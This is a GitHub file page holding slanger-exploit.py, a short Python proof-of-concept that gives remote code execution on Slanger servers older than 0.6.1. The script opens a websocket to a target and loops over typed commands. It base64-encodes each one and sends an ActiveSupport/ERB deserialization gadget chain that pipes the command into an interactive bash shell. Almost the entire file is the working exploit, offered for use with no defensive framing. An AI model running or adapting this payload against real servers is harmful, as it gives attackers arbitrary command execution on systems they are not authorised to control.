-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathslanger-exploit.py
More file actions
42 lines (36 loc) · 1.4 KB
/
slanger-exploit.py
File metadata and controls
42 lines (36 loc) · 1.4 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
from websocket import create_connection
import base64
import re
remote = "ws://172.18.0.3:8080"
app_key = "765ec374ae0a69f4ce44"
print("\nRCE in Slanger, a Ruby implementation of Pusher < 0.6.1\n")
print("[+] Checking if ws available =>", end=' ')
ws = create_connection(
remote + "/app/" + app_key + "?protocol=7&client=js&version=3.1.0&flash=false")
ws.send("{'hello':'world'}")
result = ws.recv()
m = re.search('connection_established', result)
if m:
print("\033[92mOK\033[0m")
else:
print("ws service not working")
while True:
try:
command = input("command (\033[92mnot reflected\033[0m)> ")
if command == "exit":
print("Exiting...")
break
command = base64.b64encode(command.encode('utf-8'))
command_str = command.decode('utf-8')
command_str = command_str.replace('/', '+')
print("[+] Executing command =>", end=' ')
t = '''{"^o":"ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy","instance":{"^o":"ERB","src":"system('bash','-c','{echo,command_replace}|{base64,-d}|{bash,-i}')","lineno":1337},"method":":result","deprecator":{"^o":"ActiveSupport::Deprecation","silenced":true}}'''
t = t.replace("command_replace",command_str)
print(t)
ws.send(t)
result = ws.recv()
print("\n", result, "\n")
except KeyboardInterrupt:
print("Exiting...")
break
ws.close()